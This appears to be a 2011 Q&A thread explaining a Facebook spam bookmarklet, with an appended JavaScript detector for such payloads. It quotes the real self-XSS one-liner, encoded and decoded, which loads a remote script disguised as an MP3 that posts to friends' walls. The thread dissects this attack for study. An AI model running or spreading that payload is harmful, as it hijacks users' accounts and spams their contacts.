
So, I've just seen this spam code on Facebook, written in JavaScript and I wondered if someone could explain to me how the code works, and interacts with Facebook. I do not intend to use this for malicious purposes, but I am simply interested in the security of websites like Facebook. Here is the code that is executed from the address bar (I suggest not trying it yourself, you may end up with a few annoyed friends).

javascript:(a%3D(b%3Ddocument).createElement('script')).src%3D'http%3A%2F%2Fbit.ly%2FFB1337%20%20%3F'%2BMath.random()%2Cb.body.appendChild(a)%3Bvoid(0)
James

1 Answer


Check it here; the link is URL-encoded:

http://meyerweb.com/eric/tools/dencoder/

javascript:(a=(b=document).createElement('script')).src='http://bit.ly/FB1337?'+Math.random(),b.body.appendChild(a);void(0)

From what I see: load this url as a script and add it to the current page.

Edit: The script loaded is placed at this url: http://www.raxarstudios.com/x/audiotrack2.mp3

It's masqueraded as an mp3 song, but it's just javascript: http://pastebin.com/RVmNVtt9 I've quickly glanced at it; it apparently uses some heavy ajax to add events and to join yourself to it.

Arend
    Interestingly, if you add a `+` to the bitly link you'll get a page of stats showing how many people loaded the link (4,000), the bit.ly username of the originator (`draze`) and where the link goes (an mp3 audio track) – Adam Hopkinson Jun 05 '11 at 21:02
  • Ah, very useful tips from both of you, thanks! I'm assuming that the script is encoded as an MP3 file, would this assumption be correct? I also noticed that 92% of the traffic is from Facebook, which would match up with this being a spam script. – James Jun 05 '11 at 21:06
  • That link contains an "mp3" which you can open in a text editor to see the code. Doesn't look like it does anything fancy, just makes some POST requests to facebook (which should only work if you're on facebook when you enter that link). Has nothing to do with the security of Facebook, as there's not a whole lot they can do about you going out of your way to manually run malicious javascript... – BlueRaja - Danny Pflughoeft Jun 05 '11 at 21:07
  • The script itself is just in plain javascript. But most of the browsers receive it with an mp3 mime header and won't recognize it as javascript. If you download it, you see that it's just a plain text script. – Arend Jun 05 '11 at 21:08
  • The SWF files (posted onto the victim's wall) are located on a Photobucket account belonging to 'Drazaxa'; these provide the fake video and also copy the initial script to your clipboard, which in turn links to that script disguised as an MP3 file. The MP3 file proceeds to post the 'video' on friends' walls. Thanks for the help on this one. – James Jun 05 '11 at 21:19
  • Yes, but pasting this code into the URL textbox can be dangerous if the target script that is going to be executed was coded to send some of the visitor's cookies to the owner. – Darxis Jul 06 '11 at 08:53
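The answer above decodes the address-bar payload by hand; the following is an added example (not code from the question, the answer, or Facebook) that does the same decoding programmatically and flags the self-XSS pattern the answer describes: a `javascript:` URL that creates a `<script>` element pointing at an external host and appends it to the page. The sample payload is constructed in the same shape as the one in the question, with a placeholder host instead of the real link.

```javascript
// Percent-decode the code carried by a "javascript:" URL, or return null
// if the string is not such a URL or its encoding is malformed.
function decodeJavascriptUrl(url) {
  const trimmed = url.trim();
  if (!/^javascript:/i.test(trimmed)) return null;
  try {
    return decodeURIComponent(trimmed.slice('javascript:'.length));
  } catch (e) {
    return null; // bad %-sequence
  }
}

// Classify a pasted URL: does it run script, does that script inject an
// external <script> element, and which hosts does it reference?
function analyseSelfXssPayload(url) {
  const code = decodeJavascriptUrl(url);
  if (code === null) {
    return { isJavascriptUrl: false, injectsScript: false, hosts: [], code: null };
  }
  // Copy/paste often inserts stray whitespace (the question's copy shows
  // "M  ath.random"), so match against a whitespace-free form.
  const compact = code.replace(/\s+/g, '');
  const createsScript = /createElement\(['"]script['"]\)/i.test(compact);
  const appendsToDom = /\.(appendChild|append|insertBefore)\(/.test(compact);
  const hosts = [];
  const urlRe = /https?:\/\/([^'"\s/]+)/gi;
  let m;
  while ((m = urlRe.exec(compact)) !== null) hosts.push(m[1].toLowerCase());
  return { isJavascriptUrl: true, injectsScript: createsScript && appendsToDom, hosts, code };
}

// Constructed sample: same structure as the payload in the question, but the
// script source is a placeholder host (example.invalid), not the real link.
const SAMPLE_PAYLOAD =
  "javascript:(a%3D(b%3Ddocument).createElement('script')).src%3D" +
  "'http%3A%2F%2Fexample.invalid%2Fx%3F'%2BMath.random()%2C" +
  "b.body.appendChild(a)%3Bvoid(0)";

const verdict = analyseSelfXssPayload(SAMPLE_PAYLOAD);
console.log(verdict.code);                         // the decoded one-liner
console.log('injects external script:', verdict.injectsScript, verdict.hosts);
```

The same check applied to an ordinary `https://` URL reports `isJavascriptUrl: false`, which is the distinction a paste-time warning would key on.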